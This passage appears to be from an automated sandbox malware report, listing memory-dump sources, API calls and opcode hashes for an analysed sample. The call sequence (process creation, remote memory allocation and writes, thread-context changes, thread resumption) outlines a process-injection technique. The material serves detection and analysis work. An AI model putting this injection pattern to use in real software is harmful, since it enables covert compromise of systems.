                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 000681e7d3af8b73ddd273f26b482b98d8f964234c4fcacff3e4f8c0064acdff
                                                  • Instruction ID: f0feb2056144c1616b5d1896d0267ccdea2936585dd56d74d89fcfd2794a4dca
                                                  • Opcode Fuzzy Hash: 000681e7d3af8b73ddd273f26b482b98d8f964234c4fcacff3e4f8c0064acdff
                                                  • Instruction Fuzzy Hash: 5EE0EC71E14108AFDF50EEF4C94575E76ADD701214F208AAAD809D7301E576DE42D780
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2912811982.0000000006680000.00000040.00000800.00020000.00000000.sdmp, Offset: 06680000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6680000_LisectAVT_2403002A_16.jbxd

                                                  Execution Graph

                                                  Execution Coverage: 10.7%
                                                  Dynamic/Decrypted Code Coverage: 100%
                                                  Signature Coverage: 0%
                                                  Total number of Nodes: 391
                                                  Total number of Limit Nodes: 13

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0795990E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0795990E
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: a9c47b4546466ace971c201b9d42aa89206b4c40038cb89ff70134910476e058
                                                  • Instruction ID: 34632258b192d4d668bd5af5adb30fbccb7016a27b6678e8e7b729436ab2feae
                                                  • Opcode Fuzzy Hash: a9c47b4546466ace971c201b9d42aa89206b4c40038cb89ff70134910476e058
                                                  • Instruction Fuzzy Hash: 25915DB1D0022ADFEF10CF69C8417DDBBB6BF48314F1481AAD858A7250DB75A985CF92

                                                  Control-flow Graph (graph omitted)
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 030CB086
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: f752132e9f16b6695fb00e1e6a8f6845d1d22c85cecf8ccba346fe20ca87a78a
                                                  • Instruction ID: ce4f7d30ae03941494f29469082755f9fdb6357cebe5deddca354a7132ecf027
                                                  • Opcode Fuzzy Hash: f752132e9f16b6695fb00e1e6a8f6845d1d22c85cecf8ccba346fe20ca87a78a
                                                  • Instruction Fuzzy Hash: 267158B0A11B498FD764DF6AD15079ABBF5FF88300F14896ED086D7A50DB34E84ACB90

                                                  Control-flow Graph (graph omitted)
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05731E02
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1789246755.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_5730000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 55973d6d2769ec8744fe7212c135a87717e30432dfa96396667e097fad45abec
                                                  • Instruction ID: 93d06f68a3b84b78fc982161a4799e5b2df964346790d53ef47a52089a0cff81
                                                  • Opcode Fuzzy Hash: 55973d6d2769ec8744fe7212c135a87717e30432dfa96396667e097fad45abec
                                                  • Instruction Fuzzy Hash: 225103B1D003089FDB14CFAAC885ADEBFB5FF48310F64816AE419AB221D7719845DF90

                                                  Control-flow Graph (graph omitted)
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05731E02
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1789246755.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_5730000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 7884951b0d1b2be8739fae1f9f29405e0bb895d056330c839e7dbf2b11d93a98
                                                  • Instruction ID: a684d0b3ae1cfad437c13fa5932767a2aee0647dd8962109610e91530d8f2375
                                                  • Opcode Fuzzy Hash: 7884951b0d1b2be8739fae1f9f29405e0bb895d056330c839e7dbf2b11d93a98
                                                  • Instruction Fuzzy Hash: CD51C2B1D00319DFDB14CFAAC985ADEBBB5FF48310F64812AE819AB211D771A845CF91

                                                  Control-flow Graph (graph omitted)
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05734381
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1789246755.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_5730000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 1c4a7387c74dc8f90511eac36f376e6b622e0a22b8080ebd89e6813a4d37304e
                                                  • Instruction ID: a5278ef8e9164ea90e0a31cc2e8aad9ae0f1d3b232b938b0731763d9ed859730
                                                  • Opcode Fuzzy Hash: 1c4a7387c74dc8f90511eac36f376e6b622e0a22b8080ebd89e6813a4d37304e
                                                  • Instruction Fuzzy Hash: 9141F8B59002099FCB14DF99C489AAABBF6FF88324F24C459D519AB321D775A841CFA0

                                                  Control-flow Graph (graph omitted)
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 030C59C9
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 6461c6dbb2d5e7d9da5da76d9d227bed26b95eb2727991a9f61140686ed0ea2a
                                                  • Instruction ID: ec97e867d9a3a9218a844f8c5657b5d5202a8e78008b9242aeeb744d602dd4f4
                                                  • Opcode Fuzzy Hash: 6461c6dbb2d5e7d9da5da76d9d227bed26b95eb2727991a9f61140686ed0ea2a
                                                  • Instruction Fuzzy Hash: F541F1B1C00659CBDB24DFAAC884B8EFBF5BF49304F2480AAD408AB255DB756945CF90

                                                  Control-flow Graph (graph omitted)
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 030C59C9
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 64434fa29e6bf06cf53e76e70190d9847d9e2a11bdea856272aec21540457bef
                                                  • Instruction ID: d39dd0b63dc53fcb98040092aa354f1a1340ed0b88d4684a177f555127132175
                                                  • Opcode Fuzzy Hash: 64434fa29e6bf06cf53e76e70190d9847d9e2a11bdea856272aec21540457bef
                                                  • Instruction Fuzzy Hash: 3141D1B1C00659CFDB24DFAAC884B8EFBF5BF49304F24809AD408AB255DB756985CF90

                                                  Control-flow Graph (graph omitted)
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030CB101,00000800,00000000,00000000), ref: 030CB312
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 48bcdcb7e324dbb28c70305a26478cede9a8c0b3938963ab890cf682460dbf13
                                                  • Instruction ID: 916363b6e98c10fbff540c3c0ba1abf91674f182e00ed0eaa47b7cd9bafe4bad
                                                  • Opcode Fuzzy Hash: 48bcdcb7e324dbb28c70305a26478cede9a8c0b3938963ab890cf682460dbf13
                                                  • Instruction Fuzzy Hash: 4A31A9B68043988FDB00DFA9C8556EEBFF4EF59310F04806AC494AB252C274A549CFA5

                                                  Control-flow Graph (graph omitted)
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0795D2DD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 18f7f0fa9698bf86e7dd122b786dc3626a465ca1e1891cd4afe2f33d3cf70b2a
                                                  • Instruction ID: d6e00a064ce4b0fb4c5b3a53fb3ae7488b19c9e1faaacbcc3dd6dd51a44d9498
                                                  • Opcode Fuzzy Hash: 18f7f0fa9698bf86e7dd122b786dc3626a465ca1e1891cd4afe2f33d3cf70b2a
                                                  • Instruction Fuzzy Hash: 2F21ABF28043688FDB11DFA9C4957CABFB8EB58324F14845AD894B7320D374A584CBA5
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079594E0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: bf1690bcc6df9985acb7210949cba9314f782b5b7b9bef52192547b88c053b15
                                                  • Instruction ID: d4014a61c949c2a8026eb28d2dc176d32254ba347a5fb58534595cf6073e54de
                                                  • Opcode Fuzzy Hash: bf1690bcc6df9985acb7210949cba9314f782b5b7b9bef52192547b88c053b15
                                                  • Instruction Fuzzy Hash: 442139B1900359DFDB10CFAAC885BDEBBF5FF48324F108429E958A7250C778A944CBA4

                                                  Control-flow Graph (graph omitted)
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079594E0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 1928e80d221ff8149418a11387dda0d02060e543c20ff7ecd2bc3678158c3582
                                                  • Instruction ID: 805ae22027f4947acbb61393bd847cd51cc007f3c247427df73b8467cded7756
                                                  • Opcode Fuzzy Hash: 1928e80d221ff8149418a11387dda0d02060e543c20ff7ecd2bc3678158c3582
                                                  • Instruction Fuzzy Hash: 7C2148B5900359DFDB10CFA9C8817EEBBF5FF48324F108429E958A7251C7749944CB64
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,030CD2C6,?,?,?,?,?), ref: 030CD387
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: fe19ff9991aa8979027c1811860f683975bfc5fe137270627fbce9b9ea5b74c7
                                                  • Instruction ID: 3e44d7503041c274f33f685b8a65c6d3e44da388e84fdabaa30cd9d3331b763f
                                                  • Opcode Fuzzy Hash: fe19ff9991aa8979027c1811860f683975bfc5fe137270627fbce9b9ea5b74c7
                                                  • Instruction Fuzzy Hash: 7821E3B5901348AFDB10CF9AD984ADEBBF4EB48310F14842AE918B7350D375A950CFA4
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 079595C0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 3eee7e5728e44c7c25a6826bf2220baaecb0f0aea0d0310fa112db9573a6c2f9
                                                  • Instruction ID: 58a52bb31b3a6ab64023ac93b0f7bbbd593c58eece79be2a2548114cc4d67d17
                                                  • Opcode Fuzzy Hash: 3eee7e5728e44c7c25a6826bf2220baaecb0f0aea0d0310fa112db9573a6c2f9
                                                  • Instruction Fuzzy Hash: BA2136B1D003599FDB10CFA9C841BEEBBF4FF48324F10842AE958A7250C7389555CB64
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 079595C0
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: b9022bf7d15183bb6b3f7e6ed65f485574c00857ba27ba919b45bb638c7b0851
                                                  • Instruction ID: 73f3a41aaa75f27ce230db3f924b72eba10ef59df3c794b69b7ce8ac2394d2da
                                                  • Opcode Fuzzy Hash: b9022bf7d15183bb6b3f7e6ed65f485574c00857ba27ba919b45bb638c7b0851
                                                  • Instruction Fuzzy Hash: 1C2128B19003599FDB10DFAAC841BDEFBF5FF48320F508429E959A7250C734A955CBA4
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07958AC6
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 1f12421466b856529c0d6c3c17b73afc49a9390d8991c2a02ee564771d603189
                                                  • Instruction ID: 5eb2f57129469154ddd8c25487898ab48b02fb5e89e573d87f3f773f5cb2d05f
                                                  • Opcode Fuzzy Hash: 1f12421466b856529c0d6c3c17b73afc49a9390d8991c2a02ee564771d603189
                                                  • Instruction Fuzzy Hash: 5D2149B1D003198FDB10DFAAC485BEEBBF4EF88324F148429D459A7241C778A944CFA4
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07958AC6
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: c3cea671ac348354eb954858302162bfd1700782c4644dfc7ddb818fdb4cdf90
                                                  • Instruction ID: 01885a4f97e7b1472b7be9b9ed1c3216e297520416124aa3f949b64ea4dadb54
                                                  • Opcode Fuzzy Hash: c3cea671ac348354eb954858302162bfd1700782c4644dfc7ddb818fdb4cdf90
                                                  • Instruction Fuzzy Hash: B62138B1D002198FDB10DFA9C585BEEBBF4EF48314F14842AD559B7241C778A945CFA4
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,030CD2C6,?,?,?,?,?), ref: 030CD387
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: a85b01b9ee5192b858b217047dcc0b9402a3689410251177d17f09941128d83c
                                                  • Instruction ID: 4577b20f00ba7a3ae44957a74c6415f857f3693a1a4f464725c27160fe05d5e1
                                                  • Opcode Fuzzy Hash: a85b01b9ee5192b858b217047dcc0b9402a3689410251177d17f09941128d83c
                                                  • Instruction Fuzzy Hash: 4921E3B59002589FDB10CFA9D585ADEFBF5FB48310F14841AE918B7250D374A940CFA4
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030CB101,00000800,00000000,00000000), ref: 030CB312
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: a8fcd57beb1f8a0c63d1ce04a82730d58e9be3ce3b922f496ead0107599d5018
                                                  • Instruction ID: 75e0f8461c2b3ea031e78c3c95be544b4eac8fd4173414f3db0ad3eb7d946eda
                                                  • Opcode Fuzzy Hash: a8fcd57beb1f8a0c63d1ce04a82730d58e9be3ce3b922f496ead0107599d5018
                                                  • Instruction Fuzzy Hash: 0E1112B69003489FDB10CF9AC445AEEFBF8EB48310F14842EE829B7210C375A945CFA5
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079593FE
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 2a45cdb6bb1e9c040012f67c86ee09d3a5f1b880c72b128bd01e1ef2e230b0fe
                                                  • Instruction ID: e8d703e83a3263527d7e2af66f5a0589068e6b5f1ddbd3cc46731836717f5317
                                                  • Opcode Fuzzy Hash: 2a45cdb6bb1e9c040012f67c86ee09d3a5f1b880c72b128bd01e1ef2e230b0fe
                                                  • Instruction Fuzzy Hash: 5F1167B1800259DFDB10DFAAC844BEEBFF5EF88324F208419E519A7250C735A940CFA4
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079593FE
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 46cb638ba8966b5d2edee00e7adee9410d83664a6d8e3bcf28bc9d94cd5020b5
                                                  • Instruction ID: feb7788377bf337a342b4e0df9d12a721a1b042c24809c08275c4a75de968b38
                                                  • Opcode Fuzzy Hash: 46cb638ba8966b5d2edee00e7adee9410d83664a6d8e3bcf28bc9d94cd5020b5
                                                  • Instruction Fuzzy Hash: 4B1156B6900259CFDB10CFA9C845BEEBBF5AF48324F248819D569B7250C735A944CFA4
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030CB101,00000800,00000000,00000000), ref: 030CB312
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: ea9d3a08629f7e0ffb6817c67362eda6594166009289011a3d3b9de762b865e9
                                                  • Instruction ID: 1404949d673b3321f89d10b101b2533ebbd838a1387ad837d7a61d7fb1cbcd51
                                                  • Opcode Fuzzy Hash: ea9d3a08629f7e0ffb6817c67362eda6594166009289011a3d3b9de762b865e9
                                                  • Instruction Fuzzy Hash: 7611EFB69002498FDB10CF9AD545AEEFBF8EB48320F14852ED869B7210C379A545CFA5
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: ab7f0624b225afb2e063f64b182c11365077148351fe377cf8e9d51510e9cd39
                                                  • Instruction ID: b602cb8da033d2240016904a441c51d6fedcca4f1a18dd4969a097ed1d6b2499
                                                  • Opcode Fuzzy Hash: ab7f0624b225afb2e063f64b182c11365077148351fe377cf8e9d51510e9cd39
                                                  • Instruction Fuzzy Hash: 93113AB19003598FDB10DFAAC4457EEFBF4EB88324F208419D459B7250C775A944CFA5
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 7127b4eb41f1ffc53441db3797330c3a398d649fcc438574573e0eb47c0db324
                                                  • Instruction ID: bff09863bd498f6688b25a562e6094291873d163d34743c14b57a24edff6a7ac
                                                  • Opcode Fuzzy Hash: 7127b4eb41f1ffc53441db3797330c3a398d649fcc438574573e0eb47c0db324
                                                  • Instruction Fuzzy Hash: C71128B19002598FDB14DFA9C4457EEFBF4AF88324F208829C559B7250C7356944CF95
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 030CB086
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786567199.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_30c0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 1df7d867020e6eba697abb6e9afe29133b01bad524eca9c23afc343e63eda884
                                                  • Instruction ID: d73bca39fda80f700b5d8fdb4ad2ec90d031cd3b26ee1bafd73e0aaefc5e1fdb
                                                  • Opcode Fuzzy Hash: 1df7d867020e6eba697abb6e9afe29133b01bad524eca9c23afc343e63eda884
                                                  • Instruction Fuzzy Hash: D211DFB5C003498FDB20DF9AC445ADEFBF4AB88224F24846AD869B7210C375A545CFA5
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0795D2DD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 8e8925d2882e9ca2bf91e7101cfd323815c08b526f0cc551ff5ccdd8f929c910
                                                  • Instruction ID: dd65ead460535f52164becf73eb1e07debf0229d35bb32dd3809c652859889ca
                                                  • Opcode Fuzzy Hash: 8e8925d2882e9ca2bf91e7101cfd323815c08b526f0cc551ff5ccdd8f929c910
                                                  • Instruction Fuzzy Hash: 061103B5900359DFDB10DF9AC485BDEBBF8EB48324F108459E968B7210C375A984CFA5
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0795D2DD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1790761888.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_7950000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: f9c089d638118752d6b4e1b94d3b3d55a93de0ed3fb2c278c44c78e831712f35
                                                  • Instruction ID: 7b4c8952db9eb38be115aa0f4bd450c38c078c7e5d74fe9fc9720da1856c56a5
                                                  • Opcode Fuzzy Hash: f9c089d638118752d6b4e1b94d3b3d55a93de0ed3fb2c278c44c78e831712f35
                                                  • Instruction Fuzzy Hash: 7C1100B5800359DFDB10DF99C585BDEBBF8EB08324F20881AD968B7210C375A984CFA4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786013442.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_147d000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 17cb34875e3afe7ba79335bba0c7f905e581dcf614238c414735d99b25941c28
                                                  • Instruction ID: 6bea919c90fd6490c0e65140a73ede901788766d4c47f5295735d3a66b4fbea7
                                                  • Opcode Fuzzy Hash: 17cb34875e3afe7ba79335bba0c7f905e581dcf614238c414735d99b25941c28
                                                  • Instruction Fuzzy Hash: 8E210371910240DFDB05DF58D9C0B67BF65FF88318F24C66AE9090B266C336D456CAA1
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786013442.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_147d000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 03b76e4f6f6604f85d4bb606cbd7c07820995dc8c94a8ca0942ee3f79f80f208
                                                  • Instruction ID: 21cdf9380db341ede86abc67aadcc5c39c0d2b1f727e4f73f9f4e283f41890dc
                                                  • Opcode Fuzzy Hash: 03b76e4f6f6604f85d4bb606cbd7c07820995dc8c94a8ca0942ee3f79f80f208
                                                  • Instruction Fuzzy Hash: 2C212471910200DFDB05DF48CAC0B97BF65FF84324F20C17AD9094B266C336E446CAA1
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786069367.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_148d000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 34127002aa4544e30dad05a90b160fbf94bc1d4fbf1346a16371fc11a5a42d6d
                                                  • Instruction ID: 3819c4672efbf84e0414a1d5419270021744681f37d5fbae1fa35ee8118c3895
